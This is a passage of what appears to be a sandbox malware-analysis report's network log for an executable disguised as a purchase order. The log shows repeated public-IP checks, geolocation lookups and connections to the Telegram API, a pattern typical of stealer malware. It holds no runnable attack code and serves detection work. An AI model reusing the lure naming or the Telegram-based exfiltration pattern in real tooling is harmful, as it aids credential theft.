Dec 16, 2024 14:18:17.038883924 CET	443	50137	149.154.167.220	192.168.2.4
Dec 16, 2024 14:18:17.039086103 CET	443	50137	149.154.167.220	192.168.2.4
Dec 16, 2024 14:18:17.039149046 CET	50137	443	192.168.2.4	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 16, 2024 14:14:12.388133049 CET	50164	53	192.168.2.4	1.1.1.1
Dec 16, 2024 14:14:12.527997971 CET	53	50164	1.1.1.1	192.168.2.4
Dec 16, 2024 14:14:15.052660942 CET	51794	53	192.168.2.4	1.1.1.1
Dec 16, 2024 14:14:15.196254015 CET	53	51794	1.1.1.1	192.168.2.4
Dec 16, 2024 14:14:44.409224987 CET	52922	53	192.168.2.4	1.1.1.1
Dec 16, 2024 14:14:44.547364950 CET	53	52922	1.1.1.1	192.168.2.4
Dec 16, 2024 14:16:34.824105978 CET	65111	53	192.168.2.4	1.1.1.1
Dec 16, 2024 14:16:34.962364912 CET	53	65111	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 16, 2024 14:14:12.388133049 CET	192.168.2.4	1.1.1.1	0xe0fc	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:14:15.052660942 CET	192.168.2.4	1.1.1.1	0xd786	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:14:44.409224987 CET	192.168.2.4	1.1.1.1	0x27ee	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:16:34.824105978 CET	192.168.2.4	1.1.1.1	0x523d	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 16, 2024 14:14:12.527997971 CET	1.1.1.1	192.168.2.4	0xe0fc	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 16, 2024 14:14:12.527997971 CET	1.1.1.1	192.168.2.4	0xe0fc	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:14:12.527997971 CET	1.1.1.1	192.168.2.4	0xe0fc	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:14:12.527997971 CET	1.1.1.1	192.168.2.4	0xe0fc	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:14:12.527997971 CET	1.1.1.1	192.168.2.4	0xe0fc	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:14:12.527997971 CET	1.1.1.1	192.168.2.4	0xe0fc	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:14:15.196254015 CET	1.1.1.1	192.168.2.4	0xd786	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:14:15.196254015 CET	1.1.1.1	192.168.2.4	0xd786	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:14:25.486550093 CET	1.1.1.1	192.168.2.4	0x18b	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:14:25.486550093 CET	1.1.1.1	192.168.2.4	0x18b	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:14:44.547364950 CET	1.1.1.1	192.168.2.4	0x27ee	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:16:34.962364912 CET	1.1.1.1	192.168.2.4	0x523d	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:17:47.384787083 CET	1.1.1.1	192.168.2.4	0x9815	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 16, 2024 14:17:47.384787083 CET	1.1.1.1	192.168.2.4	0x9815	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49734	132.226.8.169	80	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:14:12.654731989 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 16, 2024 14:14:14.085479975 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:14:13 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 16, 2024 14:14:14.090220928 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 16, 2024 14:14:14.581480026 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:14:14 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 16, 2024 14:14:16.880996943 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 16, 2024 14:14:17.371956110 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:14:17 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	132.226.8.169	80	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:14:19.252991915 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 16, 2024 14:14:20.684659958 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:14:20 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49740	132.226.8.169	80	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:14:22.480211020 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 16, 2024 14:14:24.170289993 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:14:23 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49744	132.226.8.169	80	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:14:25.956545115 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 16, 2024 14:14:28.073029041 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:14:27 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49749	132.226.8.169	80	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:14:29.866035938 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 16, 2024 14:14:31.830570936 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:14:31 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49752	132.226.8.169	80	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:14:33.623092890 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 16, 2024 14:14:35.948550940 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:14:35 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49754	132.226.8.169	80	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:14:37.743743896 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 16, 2024 14:14:39.210098028 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:14:38 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49756	132.226.8.169	80	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:14:41.014059067 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 16, 2024 14:14:42.601787090 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:14:42 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	172.67.177.134	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:14:16 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-16 13:14:16 UTC	876	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:14:16 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 343625 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fWBykY4Dn7qxh6XU7McxKAVYvrurI7VP%2ByV%2B4Cb7PXZim2NiuItsf713ajvrfZpE0oDKPlucHbQUc6mig9WnVWVIuANPQyHFq9g9NzSzPIaHhrs%2FtfRmfvNxRdglCiiM02taNV8w"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2eef7e5b5b0f79-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1498&min_rtt=1496&rtt_var=566&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1926121&cwnd=241&unsent_bytes=0&cid=b4ffb98dd35be710&ts=456&x=0"
2024-12-16 13:14:16 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	172.67.177.134	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:14:18 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-16 13:14:19 UTC	882	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:14:18 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 343627 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lI0LAqNFA8P8KZeCu11EV3oPM6W3Z0YW%2Bdund4zjM25HwaoKNFEEP%2BaNlG%2BgzVHdbzy93ui6H5CZ%2Fmoaukduhwm7Ftnasxq7egib4gmxvQAJkbMslceSCbe%2FQ2dA21f%2FrtkSaZbi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2eef8c8a5e41c1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1866&min_rtt=1861&rtt_var=709&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1530398&cwnd=205&unsent_bytes=0&cid=6d9bef5e6a2ed929&ts=456&x=0"
2024-12-16 13:14:19 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	172.67.177.134	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:14:21 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-16 13:14:22 UTC	876	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:14:22 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 343631 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H21Mg1JA4ERwTMk8R1BNlvGVJWXvU5%2FHjMJ8snp37i20gG8OisQfM8WzJ%2FoZ9NN9dQ0RH8Be5aAX7na5VcGkA8DI13UrAUZhtSFHxnmOTrbf53KkJ5eFfUhBOV%2BVHxYu5rWyHaJI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2eefa0adb442ea-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1688&min_rtt=1683&rtt_var=642&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1689814&cwnd=143&unsent_bytes=0&cid=a46761df948d150f&ts=451&x=0"
2024-12-16 13:14:22 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49742	172.67.177.134	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:14:25 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-16 13:14:25 UTC	876	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:14:25 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 343634 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wpkafz8NRU%2BTSB87EV7mHnj6KzKdxX5nMmLv1ut5PK6pVo3PCMQxiP4YDZa5cU%2BbpFpknyhZnf6gsx94q3yZ7FbAYVHpBDZFEIKJTWp1vZy6GJBofxB7%2FTRnRI6WUR8eu4vqN4mx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2eefb66e16437b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1599&min_rtt=1595&rtt_var=607&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1790312&cwnd=249&unsent_bytes=0&cid=231b16f25b8f7a0c&ts=450&x=0"
2024-12-16 13:14:25 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49747	172.67.177.134	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:14:29 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
